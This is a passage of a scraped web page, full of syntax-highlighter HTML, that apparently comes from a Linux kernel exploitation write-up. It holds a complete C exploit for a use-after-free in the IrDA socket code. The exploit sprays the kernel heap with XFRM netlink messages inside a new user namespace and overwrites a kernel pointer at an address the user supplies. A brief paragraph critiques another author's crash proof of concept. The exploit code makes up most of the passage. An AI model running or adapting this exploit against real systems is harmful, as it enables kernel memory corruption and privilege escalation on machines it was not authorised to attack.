class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff81f01500<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-69\"><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff81efeb60<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-70\"><span class=\"crayon-c\">\/\/addr = 0xdeadbeef;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-71\"><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target_addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5bad57622f37f374049301-72\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-73\"><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xcc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-74\"><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-75\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-76\"><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Spray memory and take control of the old freed objectn&#8221;<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-77\"><span class=\"crayon-e\">spray_heap<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-78\"><span class=\"crayon-e\">usleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">10000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-79\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-80\"><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Allocating new object to overwrite the targetted pointern&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-81\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-82\"><span class=\"crayon-c\">\/* Now inserting sock 4 obj would trigger your first oops message on<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-83\"><span class=\"crayon-c\">* dereferencing q_prev (0xdeadbeef) on the enqueue_first() path<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-84\"><span class=\"crayon-c\">* (*queue)-&gt;q_prev-&gt;q_next = element<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-85\"><span class=\"crayon-c\">*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5bad57622f37f374049301-86\"><span class=\"crayon-c\">* where queue head is pointing to the sprayed object.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-87\"><span class=\"crayon-c\">*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-88\"><span class=\"crayon-c\">* The rest is not relevant.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-89\"><span class=\"crayon-c\">*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-90\"><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x30<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;c&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-91\"><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Freeing object again n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-92\"><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-93\"><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5bad57622f37f374049301-94\"><span class=\"crayon-e\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] Fill the last object with payload n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-95\"><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0xcc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-96\"><span class=\"crayon-e\">spray_heap<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">88<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f37f374049301-97\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f37f374049301-98\"><span class=\"crayon-e\">usleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>&#8220;Here is a crash PoC showing that we&#8217;ve overwritten net_sysctl_root.set_ownership&#8221; doesn&#8217;t make sense based on the produced oops message showing that there was an attempt to execute NX memory address. 
What this oops message shows is that you&#8217;ve overwritten some function ptr (mostly due to luck) with address of the new ias_object (when binding) and then tried to execute that pointer in the original path.<\/p>\n<p><strong>Exploit<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bad57622f389003567142\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" 
data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #define _GNU_SOURCE  #include &lt;stdarg.h&gt;  #include &lt;stdint.h&gt;  #include &lt;stdio.h&gt;  #include &lt;string.h&gt;  #include &lt;time.h&gt;  #include &lt;stdlib.h&gt;  #include &lt;sys\/socket.h&gt;  #include &lt;sys\/types.h&gt;  #include &lt;sys\/wait.h&gt;  #include &lt;sys\/stat.h&gt;  #include &lt;netinet\/in.h&gt;  #include &lt;arpa\/inet.h&gt;  #include &lt;linux\/netlink.h&gt;  #include &lt;linux\/xfrm.h&gt;  #include &lt;linux\/irda.h&gt;  #include &lt;fcntl.h&gt;  #include &lt;sched.h&gt;  #include &lt;unistd.h&gt;      #define NLA_LENGTH(len)\t\t\t\t\t          (NLA_ALIGN(sizeof(struct nlattr)) + (len))  #define NLMSG_TAIL(nmsg)\t\t\t\t\t\t          ((struct nlattr *) (((void *) (nmsg)) + NLMSG_ALIGN((nmsg)-&gt;nlmsg_len)))  #define NLA_DATA(nla)\t\t\t\t\t          ((void*)(((char*)(nla)) + NLA_LENGTH(0)))    char *saddr = &#8220;1111111122222222&#8221;;  char *daddr = &#8220;3333333344444444&#8221;;    struct sockaddr_nl addr;  struct req_newae {  \tstruct nlmsghdr n;  \tstruct xfrm_aevent_id id;  \tchar buf[2048];  };    struct req_newsa {  \tstruct nlmsghdr n;  \tstruct xfrm_usersa_info xsinfo;  \tchar buf[2048];  };    void create_ns(void)  {  \tif(unshare(CLONE_NEWUSER | CLONE_NEWNET) != 0) {  \t\tperror(&#8220;unshare(CLONE_NEWUSER)&#8221;);  \t\texit(1);  \t}  }    int create_netlink_socket()  {  \tint fd,err;    \tfd = socket(AF_NETLINK,SOCK_RAW,NETLINK_XFRM);  \tif( fd &lt; 0) {  \t\tperror(&#8220;socket&#8221;);  \t\treturn -1;  \t}    \tmemset(&amp;addr,0,sizeof(struct sockaddr_nl));  \taddr.nl_family = AF_NETLINK;  \taddr.nl_pid = 0; \/* packet goes into the kernel *\/  \taddr.nl_groups = XFRMNLGRP_NONE; \/* no need for multicast group *\/  \treturn fd;  }  int send_msg(int fd,struct nlmsghdr *msg)  {  \tint err;  \terr = sendto(fd,(void 
*)msg,msg-&gt;nlmsg_len,0,(struct sockaddr*)&amp;addr,  \t\t     sizeof(struct sockaddr_nl));  \tif (err &lt; 0) {  \t\tperror(&#8220;sendto&#8221;);  \t\treturn -1;  \t}  \treturn 0;    }    int add_attr(struct nlmsghdr *n,int maxlen,int type,const void *data,int attrlen)  {  \tstruct nlattr *nl;  \tint len = NLA_LENGTH(attrlen);    \tnl = NLMSG_TAIL(n);  \tnl-&gt;nla_type = type;  \tnl-&gt;nla_len = len;  \tmemcpy(NLA_DATA(nl),data,attrlen);  \tn-&gt;nlmsg_len =NLMSG_ALIGN(n-&gt;nlmsg_len) + NLA_ALIGN(len);  \treturn 0;  }    struct req_newsa *build_sa_frame(unsigned char *payload,u_int32_t size)  {  \tstruct req_newsa *r;  \tin_addr_t src,dst;  \tstruct xfrm_mark mark = {0x0,0x0};  \tstruct xfrm_algo *algo;  \tstruct xfrm_replay_state_esn *esn;  \tsize_t esn_size;    \tr = malloc(sizeof(struct req_newsa));  \tif (!r) {  \t\tperror(&#8220;malloc&#8221;);  \t\treturn NULL;  \t}    \tr-&gt;n.nlmsg_type = XFRM_MSG_NEWSA;  \tr-&gt;n.nlmsg_flags = NLM_F_REQUEST|NLM_F_CREATE|NLM_F_EXCL;  \tr-&gt;n.nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));  \tr-&gt;xsinfo.lft.soft_byte_limit = XFRM_INF;  \tr-&gt;xsinfo.lft.hard_byte_limit = XFRM_INF;  \tr-&gt;xsinfo.lft.soft_packet_limit = XFRM_INF;  \tr-&gt;xsinfo.lft.hard_packet_limit = XFRM_INF;  \tr-&gt;xsinfo.mode = XFRM_MODE_TUNNEL;  \tr-&gt;xsinfo.flags = XFRM_STATE_ESN;    \tsrc = inet_addr(saddr);  \tdst = inet_addr(daddr);    \tr-&gt;xsinfo.family = AF_INET6;    \t\/\/r-&gt;xsinfo.saddr.a4 = src;  \t\/\/r-&gt;xsinfo.id.daddr.a4 = dst;  \tmemcpy((char*)r-&gt;xsinfo.saddr.a6,saddr,16);  \tmemcpy((char*)r-&gt;xsinfo.id.daddr.a6,daddr,16);  \tr-&gt;xsinfo.id.proto = IPPROTO_AH;  \tr-&gt;xsinfo.id.spi = 12345;  \tadd_attr(&amp;r-&gt;n,sizeof(r-&gt;buf),XFRMA_MARK,&amp;mark,sizeof(mark));    \talgo = malloc(sizeof(struct xfrm_algo)+32+1);  \tif(!algo) {  \t\tperror(&#8220;algo allocation&#8221;);  \t\treturn NULL;  \t}  \tmemset(algo-&gt;alg_name,0,sizeof(algo-&gt;alg_name));  
\tstrcpy(algo-&gt;alg_name,&#8221;hmac(sha256)&#8221;);  \talgo-&gt;alg_key_len = 0xcc;  \tstrncpy(algo-&gt;alg_key,&#8221;12345678901234567890123456789012&#8243;,32);  \tadd_attr(&amp;r-&gt;n,sizeof(r-&gt;buf),XFRMA_ALG_AUTH,algo,sizeof(struct xfrm_algo)+33);  \t  \t\/* build ens *\/  \tesn_size = sizeof(struct xfrm_replay_state_esn) + 1024;  \t  \tesn = (struct xfrm_replay_state_esn *)payload;  \t\/* This is mandatory, in order to let the kernel parse the nlattr structure  \t * if we want to use a specific memory location, we must allocate a memory  \t * with size=target address , which is a 32-bit value  \t *\/  \tesn-&gt;bmp_len = (size &#8211; sizeof(struct xfrm_replay_state_esn))\/4;  \t  \tadd_attr(&amp;r-&gt;n,sizeof(r-&gt;buf),XFRMA_REPLAY_ESN_VAL,esn,esn_size);    \treturn r;      }    void trigger() {  \topen(&#8220;\/proc\/sys\/net\/core\/somaxconn&#8221;,O_RDONLY);    \tprintf(&#8220;See crash ? n&#8221;);  }    void spray_heap(u_int8_t *payload,u_int32_t size,int iter)  {  \tint fd,err;  \tstruct req_newae *r;  \tstruct req_newsa *sa;  \tint i,j;  \t  #define SOCKFD 1000  \tint fds[SOCKFD];  \t\/* don&#8217;t make iter &gt;= 1000, or change SOCKFD   \t   to a greated value *\/  \tsa = build_sa_frame(payload,size);\t\t  \tfor(i=0;i&lt;iter;i++) {  \t\tfd = create_netlink_socket();  \t\t  \t\t\/\/printf(&#8220;send %dn&#8221;,i);  \t\tsend_msg(fd,&amp;sa-&gt;n);  \t\tfds[i] = fd;  \t\t\/* don&#8217;t close fds *\/  \t\t\/\/free(sa); \/* don&#8217;t need to do this*\/  \t\tusleep(1000);  \t}  \t\/\/free(sa);  \t  }  int irda_set_ias(int fd,char *name)  {  \tstruct irda_ias_set set;  \tint err = 0;  \tmemset(&amp;set,0,sizeof(set));      \tstrncpy(set.irda_class_name,name,64);  \tmemset(&amp;set.irda_attrib_name,&#8217;C&#8217;,255);  \tset.irda_attrib_type = 2;  \tset.attribute.irda_attrib_octet_seq.len = 8;    \tmemset(&amp;set.attribute.irda_attrib_octet_seq.octet_seq,0x41,1023);    \tset.daddr = 4;    \terr = 
setsockopt(fd,0x10a,0x2,&amp;set,sizeof(set));    \t\/\/printf(&#8220;setsockopt(SET) fd=%d  err=%dn&#8221;,fd,err);  \treturn err;  }    int irda_bind(int fd,u_int16_t  family,u_int8_t lsap_sel,int sir_addr,char *name)  {  \tstruct sockaddr_irda sa,sa1;  \tint err;  \t  \tmemset(&amp;sa,0,sizeof(sa));  \tsa.sir_family =family;  \tsa.sir_lsap_sel = lsap_sel;  \tsa.sir_addr = sir_addr;  \t  \tmemcpy(&amp;sa.sir_name,name,25);  \terr = bind(fd,(struct sockaddr*)&amp;sa,sizeof(sa));  \t\/\/printf(&#8220;bind fd=%d err=%dn&#8221;,fd,err);  \t  \treturn err;  }    void uaf(unsigned long target_addr)  {  \tint fd1,fd2,fd3,fd4;  \tstruct sockaddr_irda sa,sa1;  \tstruct irda_ias_set set;  \tint err = 0;  \tpthread_t tid[1024];  \t  \tmemset(&amp;set,0,sizeof(set));  \t  \tfd1 = socket(0x17,0x5,0);    \tfd2 = socket(0x17,0x5,0);    \tfd3 = socket(0x17,0x5,0);    \tfd4 = socket(0x17,0x5,0);    \t\/* create namespace for xfrm   \t * this is not required to trigger the bug  \t *\/  \tcreate_ns();  \t  \tirda_bind(fd1,4,0x4a,0x3,&#8221;c&#8221;);  \t  \tint i;  \t  \tirda_bind(fd2,4,0x4b,0x3,&#8221;c&#8221;);  \tirda_bind(fd3,4,0x4c,0x3,&#8221;c&#8221;);  \tirda_bind(fd1,4,0x4a,0x3,&#8221;c&#8221;);    \t  \tfor(i=0;i&lt;5;i++) {  \t\t\/* 0x00 means that it takes self-&gt;ias_obj *\/  \t\tirda_set_ias(fd2,&#8221;x00&#8243;);  \t\tirda_set_ias(fd3,&#8221;x00&#8243;);    \t}  \t  \t  \tclose(fd1);  \tclose(fd3);    \t\/* annoying the queue and free the first queued object*\/  \tprintf(&#8220;[+] Freeing the first queued ias object n&#8221;);    \tclose(fd2);  \t  \t\/\/getchar();  \tsleep(1);  \tunsigned char *buf = malloc(4096);  \tpid_t pid;  \tu_int64_t addr = 0xffffffff81f01500;  \taddr = 0xffffffff81efeb60;  \t\/\/addr = 0xdeadbeef;  \taddr = target_addr;  \tvoid *x = &amp;addr;  \tmemset(buf,0xcc,88);  \t*(void **)(buf+8) = (void*)addr;    \tprintf(&#8220;[+] Spray memory and take control of the old freed objectn&#8221;);  \tspray_heap(buf,88,200);  \tusleep(10000);  \t  
\tprintf(&#8220;[+] Allocating new object to overwrite the targetted pointern&#8221;);  \tirda_bind(fd4,4,0&#215;30,0x3,&#8221;c&#8221;);  \tprintf(&#8220;[+] Freeing object again n&#8221;);  \tclose(fd4);  \tsleep(1);  \tprintf(&#8220;[+] Fill the last object with payload n&#8221;);  \tmemset(buf,0xcc,88);  \tspray_heap(buf,88,200);    \tusleep(1000);  \t  }      int main(int argc,char **argv)  {  \tunsigned long target_addr;  \tpid_t pid;  \t  \tif(argc != 2) {  \t\tprintf(&#8220;%s &lt;target object&gt;n&#8221;,*argv);  \t\treturn -1;  \t}  \tsscanf(argv[1],&#8221;%lx&#8221;,&amp;target_addr);    \tuaf(target_addr);    \ttrigger();  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5bad57622f389003567142-12\">12<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5bad57622f389003567142-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-116\">116<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5bad57622f389003567142-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-137\">137<\/div>\n<div class=\"crayon-num 
crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-151\">151<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-152\">152<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-153\">153<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-154\">154<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-155\">155<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-156\">156<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-157\">157<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-158\">158<\/div>\n<div 
class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-159\">159<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-160\">160<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-161\">161<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-162\">162<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-163\">163<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-164\">164<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-165\">165<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-166\">166<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-167\">167<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-168\">168<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-169\">169<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-170\">170<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-171\">171<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-172\">172<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-173\">173<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-174\">174<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-175\">175<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-176\">176<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-177\">177<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f389003567142-178\">178<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f389003567142-179\">179<\/div>\n<div 
